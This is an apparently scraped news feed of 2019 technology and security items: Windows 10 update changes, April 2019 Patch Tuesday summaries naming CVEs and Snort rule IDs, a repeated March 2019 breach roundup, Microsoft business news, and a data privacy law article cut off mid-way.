The post April’s Patch Tuesday Fixes Two Vulnerabilities Being Exploited in the Wild appeared first on .



TrendLabs Security Intelligence Blog

Windows 10: New update controls for end users, automatic removal of broken updates

It seems that last year’s Windows 10 updating troubles have spurred Microsoft to make some changes to the operating system’s update experience and the company’s quality testing of updates. “In previous Windows 10 feature update rollouts, the update installation was automatically initiated on a device once our data gave us confidence that device would have a great update experience. Beginning with the Windows 10 May 2019 Update, users will be more in control of initiating … More

The post Windows 10: New update controls for end users, automatic removal of broken updates appeared first on Help Net Security.

Windows 10 now no longer requires you to ‘safely remove hardware’

Windows 10 now allows you to safely remove USB by just pulling it out, Microsoft confirms

With the release of Windows 10 version 1809, Microsoft is finally addressing the issue of accidentally removing USB drive or shutting down your computer without ejecting it first.

Microsoft is changing the default setting that is applied to USB drives and other removable media. The Redmond-based tech firm is offering two main policies regarding removal of external storage devices: Quick Removal and Better Performance.

Starting with Windows 10 version 1809, ‘Quick removal’ will be the default policy on Microsoft Windows 10, which in earlier versions of Windows was ‘Better performance,’ states the updated Microsoft support page. However, it is still possible to change the policy setting for each external device. The policy continues to remain in effect until you disconnect the device and then connect it again to the same computer port.

Quick Removal, as the name suggests, allows you to safely eject a USB or Thunderbolt-enabled external drive at any time by bypassing Safely Remove Hardware process. However, to do this, Windows cannot cache disk write operations. This may even lower the performance of the system.

On the other hand, Better performance policy manages storage operations in a manner that improves system performance. In this process, Windows can cache write operations to the external device. However, you must use the Safely Remove Hardware process to remove the external drive, or else you risk losing data.

If you select Better performance, it is recommended that you also select Enable to write caching on the device, adds Microsoft support page.

To change the policy for an external storage device, you need to follow the steps below:

1. Connect the device to the computer.

2. Right-click Start, and then select File Explorer.

3. In File Explorer, identify the letter or label that is associated with the device (for example, USB Drive (D:)).

4. Right-click Start, and then select Disk Management.

5. In the lower section of the Disk Management window, right-click the label of the device, and then click Properties.

6. Select Policies, and then select the policy you want to use.

The change in default policy for an external storage device in Windows 10 will definitely be welcomed by many seasoned Windows users who can now simply skip the Safely Remove Hardware process without getting annoyed or fear losing data.

Source: Microsoft

The post Windows 10 now no longer requires you to ‘safely remove hardware’ appeared first on TechWorm.

Microsoft officially rolls out Launcher version 5.3 for Android

Microsoft Launcher version 5.3 for Android rolls out with a new weather widget, To-Do integration and more

Last month, Microsoft had started beta testing the first major version of its popular Launcher 5.3 for Android that included several improvements.

For those unaware, Microsoft Launcher (formerly known as Arrow Launcher) is an application launcher created by Microsoft for the Android OS platform as a lightweight, fast, and efficient simplification of the Android user experience.

Effective yesterday, Microsoft has officially pushed out version 5.3 of Launcher for Android. While the most important change is the redesigned Time/Weather widget, there are also changes such as tasks card support for To-Do’s My Day, flagged e-mails from Outlook, and finetuning on UX fundamental and usability.

Let’s have a look at what’s new in Microsoft Launcher v5.3:

– Time/Weather widget redesign- Now you can have multiple widgets in multiple sizes in multiple styles for multiple locations! Also, check out the updated and more detailed L2 page with hourly and 10-day forecast.
– UX refinements to the Home Screen, Dock and Search widget
– Tasks card now supports “My Day” from Microsoft To Do
– News tab now supports “Technology” as a news interest
– Font type changed from Segoe UI to Roboto
– Work profile customers can now get access to their work apps
– Beta community link in Settings changed to lead to Microsoft Tech Community

With the recent updates to Launcher and its integration with Cortona, To-Do, Office, Windows Timeline, Microsoft News, Bing Rewards, and Sticky Notes makes it the go-to place for those who depend on Microsoft products.

You can download the latest version of Microsoft Launcher 5.3 from the Google Play Store. Alternatively, you can also use that link to join the beta program.

Source: Microsoft

The post Microsoft officially rolls out Launcher version 5.3 for Android appeared first on TechWorm.

The Laws of Vulnerabilities – Qualys Blog: April 2019 Patch Tuesday – 74 Vulns, 16 Critical, 2 Actively Attacked, 1 PoC Exploit, Adobe Vulns

This month’s Patch Tuesday addresses 74 vulnerabilities, with 16 labeled as Critical. Eight of the Critical vulns are for scripting engines and browser components, impacting Microsoft browsers and Office, along with another 5 Critical vulns in MSXML. Two Critical remote code execution (RCE) vulnerabilities are patched in GDI+ and IOleCvt. Two privilege escalation vulns in Win32k are reported as Actively Attacked, while another in the Windows AppX Deployment Service has a public PoC exploit.

Workstation Patches

Scripting Engine and MSXML patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.

Actively Attacked Privilege Escalation in Win32k

Two vulnerabilities (CVE-2019-0803 & CVE-2019-0859) exist in Win32k that could lead to privilege escalation if exploited. Microsoft reports both of these vulnerabilities as Actively Attacked. Patching should be prioritized for both Workstations and Servers.

Windows AppX Deployment Service Privilege Escalation PoC

Another privilege escalation vulnerability exists in the Windows AppX Deployment Service (AppXSVC). This service is responsible for the deployment of Windows Store apps. The vulnerability involves the service’s handling of hard links. A PoC has been made available in the public domain. Patching should be prioritized for both Workstations and Servers, as this service exists on both Windows 10 and Server 2019.

RCE vulns in GDI+ and IOleCvt

Two Critical remote code execution (RCE) vulnerabilities are patched in GDI+ and IOleCvt. These vulnerabilities require user interaction, and patching should be prioritized for workstation-type systems.

Privilege Escalation in SMB Server

A privilege escalation vulnerability was patched in the SMB Server. Exploiting this vulnerability requires the attacker to be logged into the target system and access to a malicious file via SMB.

Adobe Patches

Adobe released a large number of patches today including Flash Player, Acrobat and Reader, Shockwave Player, Dreamweaver, Adobe XD, InDesign, Experience Manager Forms, and Bridge CC. The Flash Player patch covers 1 Critical RCE and 1 Important vuln. Microsoft also ranks the Flash patches as Critical. The Acrobat/Reader patches cover 21 different vulnerabilities, 11 of which are Critical RCE. Adobe Flash and Acrobat/Reader patches should be prioritized for workstation-type systems.



The Laws of Vulnerabilities – Qualys Blog

Microsoft Releases April 2019 Security Updates — Two Flaws Under Active Attack

Microsoft today released its April 2019 software updates to address a total of 74 CVE-listed vulnerabilities in its Windows operating systems and other products, 13 of which are rated critical and rest are rated Important in severity. April 2019 security updates address flaws in Windows OS, Internet Explorer, Edge, MS Office, and MS Office Services and Web Apps, ChakraCore, Exchange Server, .

Microsoft Patch Tuesday — April 2019: Vulnerability disclosures and Snort coverage
















Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 74 vulnerabilities, 16 of which are rated “critical” and 58 that are considered “important.” This release also includes a critical advisory covering a security update to Adobe Flash Player.

This month’s security update covers security issues in a variety of Microsoft’s products, including the Chakra Scripting Engine, Microsoft Office and Windows 10. For more on our coverage of these bugs, check out the Snort blog post here, covering all of the new rules we have for this release.

Critical vulnerabilities

Microsoft disclosed 16 critical vulnerabilities this month, four of which we will highlight below.

CVE-2019-0753 is a remote code execution vulnerability in the Microsoft Scripting Engine that exists in the way the Internet Explorer web browser handles objects in memory. The bug could allow an attacker to corrupt the system in a way that would allow them to gain the same rights as the current user and execute code remotely. In order to trigger this vulnerability, the attacker needs to convince the user to open a specially crafted website in Internet Explorer. They could also embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2019-0790CVE-2019-0791, CVE-2019-0792CVE-2019-0793 and CVE-2019-0795 are all remote code execution vulnerabilities that arise when the Microsoft XML Core Services MSXML parser processes user input. An attacker could exploit any of these bugs to take control of the user’s system. A user could trigger these vulnerabilities by visiting an attacker-created web page that contains malicious MSXML.

The other critical vulnerabilities are:

Important vulnerabilities

This release also contains 58 important vulnerabilities, eight of which we will highlight below.

CVE-2019-0732 is a feature bypass vulnerability in several versions of the Windows operating system that could allow an attacker to bypass Windows Device Guard. This bug exists because Windows improperly handles calls to the LUAFV driver. An attacker could exploit this vulnerability by accessing the local machine and then running a malicious program, giving them the ability to evade a User Mode Code Integrity policy on the machine.

CVE-2019-0752 is a remote code execution vulnerability in the Microsoft Scripting Engine that exists in the way the Internet Explorer web browser handles objects in memory. The bug could allow an attacker to corrupt the system in a way that would allow them to gain the same rights as the current user and execute code remotely. In order to trigger this vulnerability, the attacker needs to convince the user to open a specially crafted website in Internet Explorer. They could also embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2019-0790 and CVE-2019-0795 are remote code execution vulnerabilities that arise when the Microsoft XML Core Services MSXML parser processes user input. An attacker could exploit any of these bugs to take control of the user’s system. A user could trigger these vulnerabilities by visiting an attacker-created web page that contains malicious MSXML.

CVE-2019-0801 is a remote code execution vulnerability in Microsoft Office that arises when the software attempts to open PowerPoint or Excel files. An attacker could exploit this bug by tricking the user into clicking on a specially crafted URL file that points to an Excel or PowerPoint file, causing the file to download.

CVE-2019-0803 and CVE-2019-0859 are elevation of privilege vulnerabilities in some versions of Windows that exist when the Win32k component improperly handles objects in memory. If exploited, an attacker could gain the ability to run arbitrary code in kernel mode. An attacker could exploit this bug by logging onto the system and then running a specially crafted application.

CVE-2019-0822 is a remote code execution vulnerability that exists in the way Microsoft Graphics Components handles objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted file, eventually allowing them to execute arbitrary code in the context of the current user.

The other important vulnerabilities are:

Coverage 

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 45632, 45635, 46548, 46549, 49380, 49381, 49688, 49689, 49692 - 49711, 49716 - 49723, 49727 - 49747, 49750 - 49755

Zingbox now part of the Microsoft Active Protections Program

Zingbox, provider of the most widely deployed Internet of Things (IoT) security and analytics platform, is now part of the Microsoft Active Protections Program (MAPP). Participation in MAPP is an important part of Zingbox’s continuing efforts to provide real-time proactive security for IoT devices. MAPP is a program through which security vendors identify vulnerabilities in Microsoft software, pooling research to enhance the overall security of devices leveraging Microsoft software. The program is an arm of … More

The post Zingbox now part of the Microsoft Active Protections Program appeared first on Help Net Security.

UK Investigates Microsoft, Sony, Nintendo Over Game Subscription Plans

An anonymous reader quotes Variety: The United Kingdom's Competition and Markets Authority (CMA) is launching a consumer law investigation into video game companies Microsoft, Sony, and Nintendo over some of their business practices, it announced on Friday. The CMA is concerned about whether or not some of the companies' practices are legal, including their use of auto-renewals for subscription services like Xbox Live, PlayStation Plus, and Nintendo Switch Online. It's also looking into their cancellation and refund policies and their terms and conditions. It said it's written to Nintendo, Sony, and Microsoft requesting information on their online gaming contracts and it's calling on people who use these services to tell the CMA about their experiences.

Read more of this story at Slashdot.

Microsoft and OpenClassrooms team up to prepare students for AI jobs

Microsoft collaborates with OpenClassrooms to recruit and train 10,000 students for AI-learning program

Redmond giant Microsoft on Wednesday announced its partnership with France-based leading online education-to-employment platform, OpenClassrooms to train and prepare students for artificial intelligence (AI) jobs in the workplace.

“As AI is changing the way we work and the nature of jobs, we have a responsibility to ensure graduates are prepared for the workplace of tomorrow,” says Jean-Philippe Courtois, Executive Vice President and President, Global Sales, Marketing and Operations at Microsoft. “We are excited to partner with OpenClassrooms to help equip people with the skills and opportunities they need to thrive in the digital economy.”

According to Microsoft, as per an estimate as many as 30% of AI and data skills jobs will be left open due to shortage of AI talent skills. With demand for AI skills exceeding supply, the new program aims to prepare skilled labor and give employers access to highly talented candidates.

“The collaboration is designed to provide more students with access to education to learn in-demand skills and to qualify for high-tech jobs, while giving employers access to great talent to fill high-tech roles,” Microsoft said in the announcement blog post.

OpenClassrooms will construct the masters-level online program based on Microsoft’s content and project-specific tasks tailored to the AI roles that employers are looking to fill. This is a fully online program that is designed to produce high-quality graduates. This model aids students and employers, who gain a cost-efficient pipeline for recruiting new talent.

“The demand for AI and machine learning opportunities has never been stronger,” says OpenClassrooms co-founder and CEO Pierre Dubuc. “We’re excited to be an innovation partner to Microsoft to usher in new tactics that will bring top talent to the workforce.”

OpenClassrooms will be recruiting 1,000 promising candidates throughout France, the U.K., and the U.S. for this program. Students who manage to complete the program have been guaranteed a job within six months or they will receive a full refund from OpenClassrooms. They will also earn a masters-level diploma accredited in Europe through OpenClassrooms. The company is actively looking for accreditation in the UK and U.S.

Source: Microsoft

The post Microsoft and OpenClassrooms team up to prepare students for AI jobs appeared first on TechWorm.

Microsoft’s Windows 10 May 2019 Update to give users better control over updates

Microsoft gives control of feature updates back to users with Windows 10 May 2019 Update

Microsoft has confirmed that its next feature update named ‘May 2019 update’ will bring “significant changes” to the Windows update process.

“We are excited to announce significant changes in the Windows update process, changes designed to improve the experience, put the user in more control, and improve the quality of Windows updates,” Microsoft corporate vice president Mike Fortin announced in the blog post. “We have heard clear feedback that the Windows update process itself can be disruptive, particularly that Windows users would like more control over when updates happen.”

The previous Windows 10 feature update rollouts were automatically installed on Windows 10 devices. With the Windows 10 May 2019 Update, users will be more in control of initiating the feature OS update and will be empowered with control and transparency around when updates are installed.

“We will provide a notification that an update is available and recommended based on our data, but it will be largely up to the user to initiate when the update occurs. In fact, all customers will now have the ability to explicitly choose if they want to update their device when they ‘check for updates’ or to pause updates for up to 35 days,” Fortin added.

While Windows 10 will no longer forcefully restart itself, however, if the updates are critical, or for features reaching the end of service, they will still take place automatically, Fortin said.

The Windows 10 May 2019 Update will allow users control over the update experience, both for feature updates and optional monthly non-security updates. There is a new “Download and install now” option in Windows Update settings, that allows users to choose to download and install updates, pause updates which are in progress at inconvenient times, and set intelligent active hours to avoid disruptive update restarts.

“We are taking further steps to be confident in the quality of the May 2019 Update. We will increase the amount of time that the May 2019 Update spends in the Release Preview phase, and we will work closely with ecosystem partners during this phase to proactively obtain more early feedback about this release. This will give us additional signals to detect issues before broader deployment. We are also continuing to make significant new investments in machine learning (ML) technology to both detect high-impact issues efficiently at scale and further evolve how we intelligently select devices that will have a smooth update experience,” Fortin writes.

The May 2019 update will be available in the Release Preview ring of the Windows Insider Program next week. Further, Windows 10 May 2019 Update is expected to start rolling out for free to compatible devices in late May 2019.

The post Microsoft’s Windows 10 May 2019 Update to give users better control over updates appeared first on TechWorm.

April Patch Tuesday Forecast: Be aware of end-of-service issues and browser exploits

April Patch Tuesday is nearly here with two significant topics of concern. The first relates to end-of-service milestones and the second issue is browser exploits. Let’s start with end-of-service. This is a fitting topic this month given we have two Windows 10 versions that are hitting end of service milestones in April, but I do want to expand the conversation beyond Windows 10 to discuss Windows 7, Server 2008 and 2008 R2, Flash Player, Java … More

The post April Patch Tuesday Forecast: Be aware of end-of-service issues and browser exploits appeared first on Help Net Security.

Microsoft and Canonical Launch Visual Studio Code Snap For Linux

Following the release of Visual Studio 2019 for Windows and Mac platforms, Microsoft today is releasing a snap version of Visual Studio Code. A report adds: No, the source-code editor is not the Windows-maker's first snap -- it also released one for Skype, for instance. "As of today, Visual Studio Code is available for Linux as a snap, providing seamless auto-updates for its users. Visual Studio Code, a free, lightweight code editor, has redefined editors for building modern web and cloud applications, with built-in support for debugging, task running, and version control for a variety of languages and frameworks," says Canonical. Joao Moreno, Software Development Engineer, Microsoft Visual Studio Code offers the following statement: "The automatic update functionality of snaps is a major benefit. It is clear there is a thriving community around snaps and that it is moving forward at great pace. The backing of Canonical ensures our confidence in its ongoing development and long-term future."

Read more of this story at Slashdot.

The End of the Desktop?

Steven J. Vaughan-Nichols, writing for ComputerWorld : Of course, at one time, to get any work done with a computer, you first had to learn a lot, about computers, operating systems, commands and more. Eventually, "friendly" became the most important adverb in computing circles, and we've reached the point in user-friendliness that people don't even talk about it anymore. Today, Google has shown with its Chrome OS that most of us can pretty much do anything we need to do on a computer with just a web browser. But Google's path is not Microsoft's path. Instead, it's moving us first to Windows as desktop as a service (DaaS) via Microsoft Managed Desktop (MMD). This bundles Windows 10 Enterprise, Office 365 and Enterprise Mobility + Security and cloud-based system management into Microsoft 365 Enterprise. The next step, Windows Virtual Desktop, enables companies to virtualize Windows 7 and 10, Office 365 ProPlus apps and other third-party applications on Azure-based virtual machines. If all goes well, you'll be able to subscribe to Windows Virtual Desktop this fall. Of course, Virtual Desktop is a play for business users -- for now. I expect Virtual Desktop to be offered to consumers in 2020. By 2025, Windows as an actual desktop operating system will be a niche product. Sound crazy? Uh, you do know that Microsoft already really, really wants you to "rent" Office 365 rather than buy Office 2019, don't you? But what about games, you say? We'll always have Windows for games! Will we? Google, with its Google Stadia gaming cloud service, is betting we're ready to move our games to the cloud as well. It's no pipe dream. Valve has been doing pretty well for years now with its Steam variation on this theme. So where is all this taking us? I see a world where the PC desktop disappears for all but a few. Most of us will be writing our documents, filling out our spreadsheets and doing whatever else we now do on our PCs via cloud-based applications on smart terminals running Chrome OS or Windows Lite. If you want a "real" PC, your choices are going to be Linux or macOS.

Read more of this story at Slashdot.

Microsoft Bounty Program Offers Larger Rewards For Bug Hunters

Microsoft, which already offers one of the biggest bug bounty programs, said today it is increasing the payouts it makes and the time it takes to push the payments. From a report: A key change in policy is that Microsoft will no longer wait until a fix has been produced for a bug until making a payout -- now the only requirement is that a bug can be reproduced. This is thanks in part to a partnership with HackerOne. [...] The maximum bounty has increased from $15,000 to $50,000 for the Windows Insider Preview bounty and from $15K to $20K for the Microsoft Cloud Bounty.

Read more of this story at Slashdot.

Microsoft rolls out new security capabilities for Azure customers

Microsoft has announced new security features for customers of its Azure cloud computing service. They are a mix of features for storage and compute services: Advanced Threat Protection for Azure Storage A regulatory compliance dashboard in Azure Security Center Security assessments, recommendations and disk encryption for Virtual Machine Scale Sets Azure Dedicated Hardware Security Module (HSM) service availability in more regions. Azure ATP and the regulatory compliance dashboard Advanced Treat Protection, which detects unusual and … More

The post Microsoft rolls out new security capabilities for Azure customers appeared first on Help Net Security.

IT Security Expert Blog: Cyber Security Roundup for March 2019

The potential threat posed by Huawei to the UK national infrastructure continues to be played out. GCHQ called for a ban on Huawei technology within UK critical networks, such as 5G networks, while Three said a Huawei ban would delay the UK 5G rollout, and the EU ignored the US calls to ban Huawei in 5G rollouts, while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing.  Meanwhile, Microsoft Researchers found an NSA-style Backdoor in Huawei Laptops, which was reported to Huawei by Microsoft, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank provided 'Heimdal Thor', security software, which was meant to protect NatWest customers from cyber-attacks but actually permitted remote injection commands at the customer's endpoint. PenTest Partners said "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups.
 
Facebook made negative security headlines yet against after they disclosed that 20,000 of their employees had access to hundreds of millions of their user account passwords for years.

One of the world’s biggest aluminium producers, 
Norsk Hydrosuffered production outages after a ransomware outbreak impacted its European and US operations.  Damages from ransomware attack on Norsk Hydro reach as high as $40M.

Citrix disclosed a security breach of its internal network may have compromised 6Tb of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement it had taken action to contain the breach, “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”.  According to security firm Resecurity, the attacks were perpetrated by Iranian-linked group known as IRIDIUM.

Credit monitoring Equifax admitted in a report it didn't follow its own patching schedule, neglecting to patch Apache Struts which led to a major 2017 breach which impacted 145 million people.  The report also said Equifax delayed alerting their customers for 6 weeks after detecting the breach.

ASUS computers had backdoors added through its software update system, in an attack coined “ShadowHammer”. Kaspersky researchers estimated malware was distributed to nearly a million people, although the cybercriminals appeared to have only targeted 600 specific devices. Asus patched the vulnerability but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections – (Hacked) Sanixer Collection #1-6, 1.8 billion unique email addresses.
  2. Aadhaar, India – (Open third party device) 1.1 billion people affected
  3. Marriott Starwood Hotels – (Hacked) 500 million guests PII
  4. Exactis – (Open device) 340 million people and businesses.
  5. HuaZhu Group – (Accidental Exposure) 240 million records
  6. Apollo – (Open device) 150 million app users.
  7. Quora – (Hacked) 100 million users.
  8. Google+ – (API Glitch) 52.2 million users.
  9. Chegg – (Hacked) 40 million accounts 
  10. Cathay Pacific Airways (Targeted attack) 9.4 million passengers.
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.
BLOG
NEWS


IT Security Expert Blog

Cyber Security Roundup for March 2019

The potential threat posed by Huawei to the UK national infrastructure continues to be played out. GCHQ called for a ban on Huawei technology within UK critical networks, such as 5G networks, while Three said a Huawei ban would delay the UK 5G rollout, and the EU ignored the US calls to ban Huawei in 5G rollouts, while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing.  Meanwhile, Microsoft Researchers found an NSA-style Backdoor in Huawei Laptops, which was reported to Huawei by Microsoft, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank provided 'Heimdal Thor', security software, which was meant to protect NatWest customers from cyber-attacks but actually permitted remote injection commands at the customer's endpoint. PenTest Partners said "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups.
 
Facebook made negative security headlines yet against after they disclosed that 20,000 of their employees had access to hundreds of millions of their user account passwords for years.

One of the world’s biggest aluminium producers, 
Norsk Hydrosuffered production outages after a ransomware outbreak impacted its European and US operations.  Damages from ransomware attack on Norsk Hydro reach as high as $40M.

Citrix disclosed a security breach of its internal network may have compromised 6Tb of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement it had taken action to contain the breach, “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”.  According to security firm Resecurity, the attacks were perpetrated by Iranian-linked group known as IRIDIUM.

Credit monitoring Equifax admitted in a report it didn't follow its own patching schedule, neglecting to patch Apache Struts which led to a major 2017 breach which impacted 145 million people.  The report also said Equifax delayed alerting their customers for 6 weeks after detecting the breach.

ASUS computers had backdoors added through its software update system, in an attack coined “ShadowHammer”. Kaspersky researchers estimated malware was distributed to nearly a million people, although the cybercriminals appeared to have only targeted 600 specific devices. Asus patched the vulnerability but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections – (Hacked) Sanixer Collection #1-6, 1.8 billion unique email addresses.
  2. Aadhaar, India – (Open third party device) 1.1 billion people affected
  3. Marriott Starwood Hotels – (Hacked) 500 million guests PII
  4. Exactis – (Open device) 340 million people and businesses.
  5. HuaZhu Group – (Accidental Exposure) 240 million records
  6. Apollo – (Open device) 150 million app users.
  7. Quora – (Hacked) 100 million users.
  8. Google+ – (API Glitch) 52.2 million users.
  9. Chegg – (Hacked) 40 million accounts 
  10. Cathay Pacific Airways (Targeted attack) 9.4 million passengers.
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.
BLOG
NEWS

Microsoft Partners With OpenClassrooms To Recruit and Train 1,000 AI Students

Microsoft is partnering with French online education platform OpenClassrooms to train and recruit promising students in AI and prepare them for the workplace. From a report: OpenClassrooms is one of a number of massive open online course (MOOC) platforms, offering an unlimited number of people access to courses ranging from programming and project management to product design. The company has raised north of $60 million since its inception in 2007, including a $60 million series B round last May. Through its latest partnership, OpenClassrooms will construct programs based on Microsoft's content and project-specific tasks -- these are designed to fill the types of AI roles that are in demand. Though it's reasonable to assume Microsoft is a potential suitor for future graduates, the scope of the program is broader than that -- those who complete the master's-level course will be given access to a range of employers with AI positions to fill.

Read more of this story at Slashdot.

Microsoft Stops Selling eBooks, Will Refund Customers For Previous Purchases

Starting today, Microsoft is ending all ebook sales in its Microsoft Store for Windows PCs. "Previously purchased ebooks will be removed from users' libraries in early July," reports The Verge. "Even free ones will be deleted. The company will offer full refunds to users for any books they've purchased or preordered." From the report: Microsoft's "official reason," according to ZDNet, is that this move is part of a strategy to help streamline the focus of the Microsoft Store. It seems that the company no longer has an interest in trying to compete with Amazon, Apple Books, and Google Play Books. It's a bit hard to imagine why anyone would go with Microsoft over those options anyway. If you have purchased ebooks from Microsoft, you can continue accessing them through the Edge browser until everything vanishes in July. After that, customers can expect to automatically receive a refund. According to a newly published Microsoft Store FAQ, "refund processing for eligible customers start rolling out automatically in early July 2019 to your original payment method." If your original payment method is no longer valid (or if you used a gift card), you'll receive a credit back to your Microsoft account to use online at the Microsoft Store. Microsoft will also offer an additional $25 credit (to your Microsoft account) if you annotated or marked up any ebook that you purchased from the Microsoft Store prior to today, April 2nd. Liliputing reminds us that "if you pay for eBooks, music, movies, video games, or any other content from a store that uses DRM, then you aren't really buying those digital items so much as paying a license fee for the rights to access them... a right that can be revoked if the company decides to remove a title from your device unexpectedly or if a company shuts down a server that would normally handle the digital rights management features." You can find DRM-free eBooks at some online stores including Smashwords and Kobo (by browsing the DRM-free selection), or from publisher websites including Angry Robot, and Baen.

Read more of this story at Slashdot.

Microsoft Launches Visual Studio 2019 For Windows and Mac

An anonymous reader writes: Microsoft today announced that Visual Studio 2019 for Windows and Mac has hit general availability — you can download it now from visualstudio.microsoft.com/downloads. Visual Studio 2019 includes AI-assisted code completion with Visual Studio IntelliCode. Separately, real-time collaboration tool Visual Studio Live Share has also hit general availability, and is now included with Visual Studio 2019.

Read more of this story at Slashdot.

The global data privacy roadmap: a question of risk

For most American businesses, complying with US data privacy laws follows a somewhat linear, albeit lengthy, path. Set up a privacy policy, don’t lie to the consumer, and check the specific rules if you’re a health care provider, video streaming company, or kids’ app maker.

For American businesses that want to expand to a new market, though, complying with global data privacy laws is more akin to finding dozens of forks in the road, each one marked with an indecipherable signpost.

Should a company expand to China? That depends on whether the company wants to have its source code potentially analyzed by the Chinese government. Okay, what about South Korea? Well, is the company ready to pay three percent of its revenue for a wrongful data transfer, or to have one of its executives spend time behind bars?

Europe is an obvious market to capture, right? That’s true, but, depending on which country, the local data protection authorities could issue enormous fines for violating the General Data Protection Regulation.

What if a company just follows in the footsteps of the more established firms, like Google, Amazon, or Microsoft, which all opened data centers in Singapore in the past two years? Once again, the answer depends on the company. If it’s providing a service that Singapore considers “essential,” it will have to heed a new cybersecurity law there.

At this point, a company might think about entering a country with no data privacy laws. No laws, no getting in trouble, right? Wrong. Data privacy laws can sprout up seemingly overnight, and future compliance costs could severely cut into a company’s budget.

While this may appear overcomplicated, one guiding principle helps: If a company cannot afford to comply with a country’s data privacy laws, it probably should not expand to that country. The risk, which could be millions in penalties, might not outweigh the reward.

Today, for the third piece in our data privacy and cybersecurity blog series, which also took a look at current US data privacy laws and federal legislation on the floor, we explore the decision-making process of a mid-market-sized company that wants to expand its business outside the United States.

With the help of Reed Smith LLP counsel Xiaoyan Zhang, we looked at several notable data privacy laws in Europe, Asia, Latin America, the Middle East, and Africa.

Issue-spotting within a culturally-crafted landscape

Before a company expands into a new country, it should try to truly comprehend the data privacy laws located within, Zhang said. She said this involves more than just reading the law; it requires training one’s thinking into an entirely different culture.

Unlike crimes including manslaughter and robbery—which have near-universal definitions—Zhang said data privacy violations fluctuate from region to region, with interpretations rooted in a country’s history, economy, public awareness, and opinions on privacy.

“Data privacy is not like murder, which is much more straightforward,” Zhang said. “Privacy law is very intimately tied into culture.”

So, while overseas concepts might appear familiar— like protecting “personally identifiable information” in the US and protecting “personal information” in the European Union—the culture behind those concepts varies.

For example, in the European Union, a history of fierce antitrust regulation and government enforcement helped usher GDPR’s passage. In fact, Austrian online privacy advocate Max Schrems—whose legal complaints against Facebook heavily influenced the final text of GDPR—remarked years ago that he was surprised at the lack of tall garden hedges around Americans’ homes. The country’s understanding of privacy, Schrems realized, was different than that of Austria, and so, too, are its data privacy laws.

Similarly, Zhang said she has fielded many questions from EU lawyers who assume that data privacy regulations around the world are similar to those in GDPR.

“EU lawyers are used to thinking that, for every data collection, there must be a legitimate purpose, and they insist on asking the same questions,” Zhang said. “When I’m talking about legal advice in China, they’ll say ‘Oh, our medical device needs to collect data from users, does China have any law or statutes that give us a legitimate business purpose to collect that data?’”

Zhang continued: “No. In China, you don’t need that. It’s totally different.”

The differences can be managed with the right help, though.

The safest path for market expansion is to rely on a global data privacy lawyer to “issue-spot” any obvious global compliance issues, Zhang said. These experts will look at what type of data a company handles—including medical, financial, geolocation, biometric, and others—what type of service the company performs, and whether the company will need to perform frequent cross-border data transfers. Depending on all these factors, each company’s individual roadmap for data privacy compliance will be unique.

However, Zhang led us on a bit of a world tour, detailing some of the notable data privacy laws in Europe, Asia, Africa, the Middle East, and Latin America. Company expansion into these markets, Zhang emphasized, depends on whether a company is ready for compliance.

Many countries, many laws

Europe

Starting with Europe there is, of course, GDPR. Complying with the sweeping set of provisions is tricky because GDPR gives each EU member-state the authority to enforce the new data protection law on its own turf.

This enforcement is done through Data Protection Authorities (DPAs), which oversee, investigate, and issue fines for GDPR violation. Each member-state has its own DPA, and, in the months before GDPR’s implementation, the DPAs gave mixed signals about what local enforcement would look like.

France’s DPA, the National Data Protection Commission (CNIL), said that companies that are at least trying to comply with GDPR “can expect to be treated leniently initially, provided that they have acted in good faith.”

Less than one year later, though, that leniency met its limit. CNIL hit Google with the largest GDPR-violation fine on record, at roughly $57 million.

The best defense to these penalties, Zhang said, is to consult with local legal experts who know the region’s enforcement history and details.

“You cannot just seek consultation from a GDPR expert. If you want to go specifically to Germany, you need German lawyers who can offer insight on things that are specific to Germany,” Zhang said. “That’s for all of Europe.”

Latin America

Outside of Europe—but still inspired by GDPR—is Latin America. Zhang said several Latin American countries have enacted, or are considering, legislation that protects the data privacy rights of individuals.

In 2018, Brazil passed its comprehensive data protection law, which protects people’s personal information and includes tighter protections for sensitive information that discloses race, ethnicity, religion, political affiliation, and biometrics. Argentina also forwarded privacy protections for its citizens, and it earned a special clearance in GDPR as a “whitelisted” party, meaning that personal data can be moved to Argentina from the EU without extra safeguards.

Asia

